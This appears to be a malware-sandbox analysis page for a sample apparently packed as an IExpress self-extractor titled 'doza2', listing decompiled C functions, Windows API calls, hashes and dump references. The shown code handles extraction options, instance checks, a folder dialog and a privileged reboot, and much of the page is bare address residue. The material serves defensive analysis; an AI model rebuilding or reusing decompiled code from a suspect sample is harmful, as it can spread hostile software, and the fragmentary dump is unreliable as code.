                                                                                                                                                                                                                                    0x009660d6
                                                                                                                                                                                                                                    0x009660e0
                                                                                                                                                                                                                                    0x009660e7
                                                                                                                                                                                                                                    0x009660f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009660f5
                                                                                                                                                                                                                                    0x0096609c
                                                                                                                                                                                                                                    0x00966081
                                                                                                                                                                                                                                    0x00965e62
                                                                                                                                                                                                                                    0x00965e62
                                                                                                                                                                                                                                    0x00965e65
                                                                                                                                                                                                                                    0x00965fd3
                                                                                                                                                                                                                                    0x00965fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fef
                                                                                                                                                                                                                                    0x00965fef
                                                                                                                                                                                                                                    0x00965ff7
                                                                                                                                                                                                                                    0x00965ffd
                                                                                                                                                                                                                                    0x00966003
                                                                                                                                                                                                                                    0x00966006
                                                                                                                                                                                                                                    0x00966011
                                                                                                                                                                                                                                    0x00966014
                                                                                                                                                                                                                                    0x0096603d
                                                                                                                                                                                                                                    0x00966016
                                                                                                                                                                                                                                    0x00966018
                                                                                                                                                                                                                                    0x00966019
                                                                                                                                                                                                                                    0x0096601b
                                                                                                                                                                                                                                    0x00966033
                                                                                                                                                                                                                                    0x0096601d
                                                                                                                                                                                                                                    0x00966020
[Execution graph residue: only basic-block start addresses survived (range 0x00965d00 to 0x00966200, with 0x00000000 placeholder entries); the instruction listing for these blocks is not available on this page]

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00965CEE
• GetModuleFileNameA.KERNEL32(00968B3E,00000104,00000000,?,?), ref: 00965DFC
• CharUpperA.USER32(?), ref: 00965E3E
• CharUpperA.USER32(-00000052), ref: 00965EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00965F6F
• CharUpperA.USER32(?), ref: 00965FA7
• CharUpperA.USER32(-0000004E), ref: 00966008
• CharUpperA.USER32(?), ref: 009660AA
• CloseHandle.KERNEL32(00000000,00961140,00000000,00000040,00000000), ref: 009661F1
• ExitProcess.KERNEL32 ref: 009661F8
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: f7984660e33b64daad4ccb6829872d1a9cb669e4a743369a4c9b8d77e31f9dae
• Instruction ID: 7891326f10b5458f7baa0dd9481cdc8e7cd6225784d8a79f85935d6c85fea4cd
• Opcode Fuzzy Hash: f7984660e33b64daad4ccb6829872d1a9cb669e4a743369a4c9b8d77e31f9dae
• Instruction Fuzzy Hash: E5D1A071A0CA446FDF35CB389C583BA3BADAB56304F1605AEC4C6D61D1DAB58E82DF40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
E00961F90(signed int __ecx, void* __edi, void* __esi) {
	signed int _v8;
	int _v12;
	struct _TOKEN_PRIVILEGES _v24;
	void* _v28;
	void* __ebx;
	signed int _t13;
	int _t21;
	void* _t25;
	int _t28;
	signed char _t30;
	void* _t38;
	void* _t40;
	void* _t41;
	signed int _t46;

	_t41 = __esi;
	_t38 = __edi;
	_t30 = __ecx;
	if((__ecx & 0x00000002) != 0) {
		L12:
		if((_t30 & 0x00000004) != 0) {
			L14:
			if( *0x969a40 != 0) {
				_pop(_t30);
				_t44 = _t46;
				_t13 =  *0x968004; // 0xf4cc89a0
				_v8 = _t13 ^ _t46;
				_push(_t38);
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
					CloseHandle(_v28);
					_t41 = _t41;
					_push(0);
					if(_t21 != 0) {
						if(ExitWindowsEx(2, ??) != 0) {
							_t25 = 1;
						} else {
							_t37 = 0x4f7;
							goto L3;
						}
					} else {
						_t37 = 0x4f6;
						goto L4;
					}
				} else {
					_t37 = 0x4f5;
					L3:
					_push(0);
					L4:
					_push(0x10);
					_push(0);
					_push(0);
					E009644B9(0, _t37);
					_t25 = 0;
				}
				_pop(_t40);
				return E00966CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
			} else {
				_t28 = ExitWindowsEx(2, 0);
				goto L16;
			}
		} else {
			_t37 = 0x522;
			_t28 = E009644B9(0, 0x522, 0x961140, 0, 0x40, 4);
			if(_t28 != 6) {
				goto L16;
			} else {
				goto L14;
			}
		}
	} else {
		__eax = E00961EA7(__ecx);
		if(__eax != 2) {
			L16:
			return _t28;
		} else {
			goto L12;
		}
	}
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00961EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00961F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00961FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: 4df4f9d11d9b41004e34f38994ae211da847427eeba9f702a4f1a27764a003ad
                                                                                                                                                                                                                                    • Instruction ID: 0dc456a49bebb203a80b234c801e2ca2d4e4f937f4caa0a0f767cde40932968d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4df4f9d11d9b41004e34f38994ae211da847427eeba9f702a4f1a27764a003ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5321DB71B48205BBDB309BE19C4AFBF77BCEBD6B10F14041DFA02E6181DB798801A661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00966CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00966E26,00961000), ref: 00966CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00966E26,?,00966E26,00961000), ref: 00966D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00966E26,00961000), ref: 00966D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00966E26,00961000), ref: 00966D12
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: 77907fb4cede64bd901cc6ba61d645b809fc2df709638e4088cfbb70401721fb
                                                                                                                                                                                                                                    • Instruction ID: 7c4b99575da34a17ddcf0112379d116621942e7293aa0bd3fa39519d7b284697
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77907fb4cede64bd901cc6ba61d645b809fc2df709638e4088cfbb70401721fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34D0123201C108BBDB002BF1EC0CA593F28FB4A322F464008F31DA2020CBB29851EF53
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 76%
E00963210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
	void* __edi;
	void* _t6;
	void* _t10;
	int _t20;
	int _t21;
	int _t23;
	char _t24;
	long _t25;
	int _t27;
	int _t30;
	void* _t32;
	int _t33;
	int _t34;
	int _t37;
	int _t38;
	int _t39;
	void* _t42;
	void* _t46;
	CHAR* _t49;
	void* _t58;
	void* _t63;
	struct HWND__* _t64;

	_t64 = _a4;
	_t6 = _a8 - 0x10;
	if(_t6 == 0) {
		_push(0);
		L38:
		EndDialog(_t64, ??);
		L39:
		__eflags = 1;
		return 1;
	}
	_t42 = 1;
	_t10 = _t6 - 0x100;
	if(_t10 == 0) {
		E009643D0(_t64, GetDesktopWindow());
		SetWindowTextA(_t64, "doza2");
		SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
		__eflags =  *0x969a40 - _t42; // 0x3
		if(__eflags == 0) {
			EnableWindow(GetDlgItem(_t64, 0x836), 0);
		}
		L36:
		return _t42;
	}
	if(_t10 == _t42) {
		_t20 = _a12 - 1;
		__eflags = _t20;
		if(_t20 == 0) {
			_t21 = GetDlgItemTextA(_t64, 0x835, 0x9691e4, 0x104);
			__eflags = _t21;
			if(_t21 == 0) {
				L32:
				_t58 = 0x4bf;
				_push(0);
				_push(0x10);
				_push(0);
				_push(0);
				L25:
				E009644B9(_t64, _t58);
				goto L39;
			}
			_t49 = 0x9691e4;
			do {
				_t23 =  *_t49;
				_t49 =  &(_t49[1]);
				__eflags = _t23;
			} while (_t23 != 0);
			__eflags = _t49 - 0x9691e5 - 3;
			if(_t49 - 0x9691e5 < 3) {
				goto L32;
			}
			_t24 =  *0x9691e5; // 0x3a
			__eflags = _t24 - 0x3a;
			if(_t24 == 0x3a) {
				L21:
				_t25 = GetFileAttributesA(0x9691e4);
				__eflags = _t25 - 0xffffffff;
				if(_t25 != 0xffffffff) {
					L26:
					E0096658A(0x9691e4, 0x104, 0x961140);
					_t27 = E009658C8(0x9691e4);
					__eflags = _t27;
					if(_t27 != 0) {
						__eflags =  *0x9691e4 - 0x5c;
						if( *0x9691e4 != 0x5c) {
							L30:
							_t30 = E0096597D(0x9691e4, 1, _t64, 1);
							__eflags = _t30;
							if(_t30 == 0) {
								L35:
								_t42 = 1;
								__eflags = 1;
								goto L36;
							}
							L31:
							_t42 = 1;
							EndDialog(_t64, 1);
							goto L36;
						}
						__eflags =  *0x9691e5 - 0x5c;
						if( *0x9691e5 == 0x5c) {
							goto L31;
						}
						goto L30;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t58 = 0x4be;
					goto L25;
				}
				_t32 = E009644B9(_t64, 0x54a, 0x9691e4, 0, 0x20, 4);
				__eflags = _t32 - 6;
				if(_t32 != 6) {
					goto L35;
				}
				_t33 = CreateDirectoryA(0x9691e4, 0);
				__eflags = _t33;
				if(_t33 != 0) {
					goto L26;
				}
				_push(0);
				_push(0x10);
				_push(0);
				_push(0x9691e4);
				_t58 = 0x4cb;
				goto L25;
			}
			__eflags =  *0x9691e4 - 0x5c;
			if( *0x9691e4 != 0x5c) {
				goto L32;
			}
			__eflags = _t24 - 0x5c;
			if(_t24 != 0x5c) {
				goto L32;
			}
			goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                                                    						 *0x969124 = 0x800704c7;
                                                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t37 = LoadStringA( *0x969a3c, 0x3e8, 0x968598, 0x200);
                                                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                                                    						_t38 = E00964224(_t64, _t46, _t46);
                                                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9687a0);
                                                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						E009644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0096335c
                                                                                                                                                                                                                                    0x00963362
                                                                                                                                                                                                                                    0x00963364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963366
                                                                                                                                                                                                                                    0x00963367
                                                                                                                                                                                                                                    0x00963369
                                                                                                                                                                                                                                    0x0096336a
                                                                                                                                                                                                                                    0x0096336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096336b
                                                                                                                                                                                                                                    0x0096331c
                                                                                                                                                                                                                                    0x00963323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963329
                                                                                                                                                                                                                                    0x0096332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096332b
                                                                                                                                                                                                                                    0x0096324c
                                                                                                                                                                                                                                    0x0096324c
                                                                                                                                                                                                                                    0x0096324f
                                                                                                                                                                                                                                    0x009632c8
                                                                                                                                                                                                                                    0x009632ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632ce
                                                                                                                                                                                                                                    0x00963251
                                                                                                                                                                                                                                    0x00963256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963271
                                                                                                                                                                                                                                    0x00963277
                                                                                                                                                                                                                                    0x00963279
                                                                                                                                                                                                                                    0x00963298
                                                                                                                                                                                                                                    0x0096329d
                                                                                                                                                                                                                                    0x0096329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632b0
                                                                                                                                                                                                                                    0x009632b6
                                                                                                                                                                                                                                    0x009632b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632be
                                                                                                                                                                                                                                    0x00963280
                                                                                                                                                                                                                                    0x00963289
                                                                                                                                                                                                                                    0x0096328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096328e
                                                                                                                                                                                                                                    0x0096327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096327b
                                                                                                                                                                                                                                    0x00000000

APIs
• LoadStringA.USER32(000003E8,00968598,00000200), ref: 00963271
• GetDesktopWindow.USER32 ref: 009633E2
• SetWindowTextA.USER32(?,doza2), ref: 009633F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00963410
• GetDlgItem.USER32(?,00000836), ref: 00963426
• EnableWindow.USER32(00000000), ref: 0096342D
• EndDialog.USER32(?,00000000), ref: 0096343F
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$doza2
• API String ID: 2418873061-1966320441
• Opcode ID: 84b7c21788ba5d125c0d1f049d1e3acf1c64b53191fac2ee513043c261d54d39
• Instruction ID: f76c85fca5b728782a88eb6a227e96a715a1039c5ac0cbd9ed89bed7c0856f45
• Opcode Fuzzy Hash: 84b7c21788ba5d125c0d1f049d1e3acf1c64b53191fac2ee513043c261d54d39
• Instruction Fuzzy Hash: 6551263039824077FB215B355C8DF7B695CDB96B54F90C52CF206E62E1DEE88A01A761
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00962CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t13;
	void* _t20;
	void* _t23;
	void* _t27;
	struct HRSRC__* _t31;
	intOrPtr _t33;
	void* _t43;
	void* _t48;
	signed int _t65;
	struct HINSTANCE__* _t66;
	signed int _t67;

	_t13 =  *0x968004; // 0xf4cc89a0
	_v8 = _t13 ^ _t67;
	_t65 = 0;
	_t66 = __ecx;
	_t48 = __edx;
	 *0x969a3c = __ecx;
	memset(0x969140, 0, 0x8fc);
	memset(0x968a20, 0, 0x32c);
	memset(0x9688c0, 0, 0x104);
	 *0x9693ec = 1;
	_t20 = E0096468F("TITLE", 0x969154, 0x7f);
	if(_t20 == 0 || _t20 > 0x80) {
		_t64 = 0x4b1;
		goto L32;
	} else {
		_t27 = CreateEventA(0, 1, 1, 0);
		 *0x96858c = _t27;
		SetEvent(_t27);
		_t64 = 0x969a34;
		if(E0096468F("EXTRACTOPT", 0x969a34, 4) != 0) {
			if(( *0x969a34 & 0x000000c0) == 0) {
				L12:
				 *0x969120 =  *0x969120 & _t65;
				if(E00965C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                    								if( *0x968a3a == 0) {
                                                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if( *0x968184 != 0) {
                                                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if( *0x968a24 == 0) {
                                                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                                                    										if(E009636EE(_t65) == 0) {
                                                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t33 =  *0x969a40; // 0x3
                                                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                    												if(( *0x969a34 & 0x00000100) == 0 || ( *0x968a38 & 0x00000001) != 0 || E009618A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                                                    													if(E00966517(_t57, 0x7d6, _t34, E009619E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E00962390(0x968a3a);
                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                    								E009644B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                                                    							if(E0096468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                    								 *0x968588 = _t43;
                                                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(( *0x969a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                                                    										if(E009644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                                                    										E009644B9(0, 0x54b, "doza2", 0, 0x10, 0);
                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                    										CloseHandle( *0x968588);
                                                                                                                                                                                                                                    										 *0x969124 = 0x800700b7;
                                                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                                                    						E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						 *0x969124 = 0x80070714;
                                                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                    			}
0x00962cb5
0x00962cbc
0x00962cc7
0x00962cc9
0x00962cd1
0x00962cd3
0x00962cd9
0x00962ce9
0x00962cf9
0x00962d0e
0x00962d15
0x00962d1c
0x00962ef3
0x00000000
0x00962d2d
0x00962d34
0x00962d3b
0x00962d40
0x00962d48
0x00962d59
0x00962d84
0x00962e1f
0x00962e1f
0x00962e2e
0x00962e41
0x00962e5a
0x00962e62
0x00962e6c
0x00962e6c
0x00962e75
0x00962e77
0x00962e77
0x00962e84
0x00962e8b
0x00962e94
0x00000000
0x00962e96
0x00962e96
0x00962e9e
0x00962ea2
0x00962eba
0x00000000
0x00962ece
0x00962ede
0x00962eed
0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962eed
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962ea2
                                                                                                                                                                                                                                    0x00962e86
                                                                                                                                                                                                                                    0x00962e88
                                                                                                                                                                                                                                    0x00962e88
                                                                                                                                                                                                                                    0x00962e43
                                                                                                                                                                                                                                    0x00962e48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962e48
                                                                                                                                                                                                                                    0x00962e30
                                                                                                                                                                                                                                    0x00962e30
                                                                                                                                                                                                                                    0x00962ef8
                                                                                                                                                                                                                                    0x00962f01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962f01
                                                                                                                                                                                                                                    0x00962d8a
                                                                                                                                                                                                                                    0x00962d8f
                                                                                                                                                                                                                                    0x00962da1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962da3
                                                                                                                                                                                                                                    0x00962dae
                                                                                                                                                                                                                                    0x00962db4
                                                                                                                                                                                                                                    0x00962dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962dca
                                                                                                                                                                                                                                    0x00962dd3
                                                                                                                                                                                                                                    0x00962df5
                                                                                                                                                                                                                                    0x00962e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962dd5
                                                                                                                                                                                                                                    0x00962dde
                                                                                                                                                                                                                                    0x00962de3
                                                                                                                                                                                                                                    0x00962e04
                                                                                                                                                                                                                                    0x00962e0a
                                                                                                                                                                                                                                    0x00962e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962e10
                                                                                                                                                                                                                                    0x00962dd3
                                                                                                                                                                                                                                    0x00962dbb
                                                                                                                                                                                                                                    0x00962da1
                                                                                                                                                                                                                                    0x00962d5b
                                                                                                                                                                                                                                    0x00962d5b
                                                                                                                                                                                                                                    0x00962d5d
                                                                                                                                                                                                                                    0x00962d69
                                                                                                                                                                                                                                    0x00962d6e
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962d59
                                                                                                                                                                                                                                    0x00962f18

APIs
• memset.MSVCRT ref: 00962CD9
• memset.MSVCRT ref: 00962CE9
• memset.MSVCRT ref: 00962CF9
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
  • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
  • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
  • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
  • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
  • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00962D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00962D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00962DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00962DBD
• CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00962E0A
